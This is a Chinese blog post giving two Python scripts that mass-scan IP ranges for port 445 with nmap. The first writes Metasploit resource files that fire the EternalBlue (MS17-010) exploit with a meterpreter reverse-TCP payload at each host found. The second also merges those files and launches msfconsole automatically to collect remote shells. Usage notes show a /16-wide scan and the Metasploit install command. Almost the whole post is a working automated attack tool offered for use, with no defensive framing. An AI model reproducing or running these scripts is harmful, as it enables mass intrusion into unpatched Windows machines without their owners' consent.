批量扫描永恒之蓝脚本
摘要:python3调用msf和nmap批量扫描永恒之蓝
扫描脚本版本
# -*- coding:utf8 -*-
from threading import Thread
import nmap
import optparse
import os
from IPy import IP
# 根据参数拆分target
def find_target(target, num, countofip, count):
fenge = int(countofip / count)
start = fenge * (num - 1)
end = fenge * num
if end > countofip:
end = countofip
for host in target[start:end]:
host = str(host)
scanner = nmap.PortScanner()
rst = scanner.scan(host, '445')
if rst['nmap']['scanstats']['uphosts'] == '0':
print("thread"+str(num)+":"+'Host not up:' + host)
continue
state = rst['scan'][host]['tcp'][445]['state']
if state == 'open':
print("thread"+str(num)+":"+str(host) + ' with 445 port open, there may be a vulnerability in ms17_010')
saveip(num, host)
else:
print("thread"+str(num)+":"+str(host) + ' 445 port not open!')
continue
def create_file(configfile, host):
configfile.write('use exploit/windows/smb/ms17_010_eternalblue\n')
configfile.write('set rhost ' + host + '\n')
configfile.write('set payload windows/x64/meterpreter/reverse_tcp\n')
lport = 4444 + int(host.split('.')[-1]) + int(host.split('.')[-2])
configfile.write('set lport ' + str(lport) + '\n')
configfile.write('set lhost ' + str(lhost) + '\n')
configfile.write('exploit -j -z\n')
print("Your shell will created at " + str(lhost) + ":" + str(lport))
# 保存ip
def saveip(num, host):
configfile = open('meta' + str(num) + '.rc', 'a')
create_file(configfile, host)
configfile.close()
def main():
parser = optparse.OptionParser('%prog -H <target> -L <lhost> -C <count>')
parser.add_option('-H', dest='host', type='string')
parser.add_option('-L', dest='lhost', type='string')
parser.add_option('-C', dest='count', type='int')
(options, args) = parser.parse_args()
host = options.host
global lhost
lhost = options.lhost
count = options.count
countofthread = []
target = IP(host)
countofip = target.len()
if host == None:
parser.print_help()
exit(0)
countofthread.append("thread0")
for i in range(1, count+1):
countofthread.append("thread" + str(i))
for i in range(1, count+1):
countofthread[i] = Thread(target=find_target, args=(target, i, countofip, count,))
countofthread[i].start()
if __name__ == '__main__':
main()
使用说明:
需要先安装pip3 install python-nmap,pip3 install IPy这几个包
root@ubuntufree:~#python3 shaoip.py -H 192.168.0.0/16 -L 127.0.1.1 -C 3
// shaoip.py 为脚本的路径
// -H 192.168.0.0/16 为对192.168.0.0/16网段进行扫描
// -C 3为线程数,3为同时使用三个线程
扫描结果保存在形如meta1.rc,meta2.rc的文件中。文件的数量等于使用的线程数。
扫描脚本&&获取shell版本
# -*- coding:utf8 -*-
from threading import Thread
import nmap
import optparse
import os
from IPy import IP
# 根据参数拆分target
def find_target(target, num, countofip, count):
fenge = int(countofip / count)
start = fenge * (num - 1)
end = fenge * num
if end > countofip:
end = countofip
for host in target[start:end]:
host = str(host)
scanner = nmap.PortScanner()
rst = scanner.scan(host, '445')
if rst['nmap']['scanstats']['uphosts'] == '0':
print("thread"+str(num)+":"+'Host not up:' + host)
continue
state = rst['scan'][host]['tcp'][445]['state']
if state == 'open':
print("thread"+str(num)+":"+str(host) + ' with 445 port open, there may be a vulnerability in ms17_010')
saveip(num, host)
else:
print("thread"+str(num)+":"+str(host) + ' 445 port not open!')
continue
def create_file(configfile, host):
configfile.write('use exploit/windows/smb/ms17_010_eternalblue\n')
configfile.write('set rhost ' + host + '\n')
configfile.write('set payload windows/x64/meterpreter/reverse_tcp\n')
lport = 4444 + int(host.split('.')[-1]) + int(host.split('.')[-2])
configfile.write('set lport ' + str(lport) + '\n')
configfile.write('set lhost ' + str(lhost) + '\n')
configfile.write('exploit -j -z\n')
print("Your shell will created at " + str(lhost) + ":" + str(lport))
# 保存ip
def saveip(num, host):
configfile = open('meta' + str(num) + '.rc', 'a')
create_file(configfile, host)
configfile.close()
def merge(count):
f1= open("meta1.rc", 'a')
for i in range(2, count+1):
if count==1 :
break
f2=open("meta"+str(i)+".rc", 'a')
f2.close()
with open("meta"+str(i)+".rc", 'r') as f2:
for i in f2:
f1.write(i)
def main():
parser = optparse.OptionParser('%prog -H <target> -L <lhost> -C <count>')
parser.add_option('-H', dest='host', type='string')
parser.add_option('-L', dest='lhost', type='string')
parser.add_option('-C', dest='count', type='int')
(options, args) = parser.parse_args()
host = options.host
global lhost
lhost = options.lhost
count = options.count
countofthread = []
target = IP(host)
countofip = target.len()
if host == None:
parser.print_help()
exit(0)
countofthread.append("thread0")
for i in range(1, count+1):
countofthread.append("thread" + str(i))
for i in range(1, count+1):
countofthread[i] = Thread(target=find_target, args=(target, i, countofip, count,))
countofthread[i].start()
for i in range(1, count+1):
countofthread[i].join()
merge(count)
command='msfconsole -r meta1.rc'
os.system(command)
if __name__ == '__main__':
main()
使用说明:
需要先安装pip3 install python-nmap,pip3 install IPy这几个包以及安装msf
安装msf命令:
root@ubuntufree:~#curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
root@ubuntufree:~#python3 shaoip.py -H 192.168.0.0/16 -L 127.0.1.1 -C 3
// shaoip.py 为脚本的路径
// -H 192.168.0.0/16 为对192.168.0.0/16网段进行扫描
// -C 3为线程数,3为同时使用三个线程
扫描结果保存在meta1.rc的文件中。可以在msf中使用sessions查看已经获得的shell
文章目录
本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可。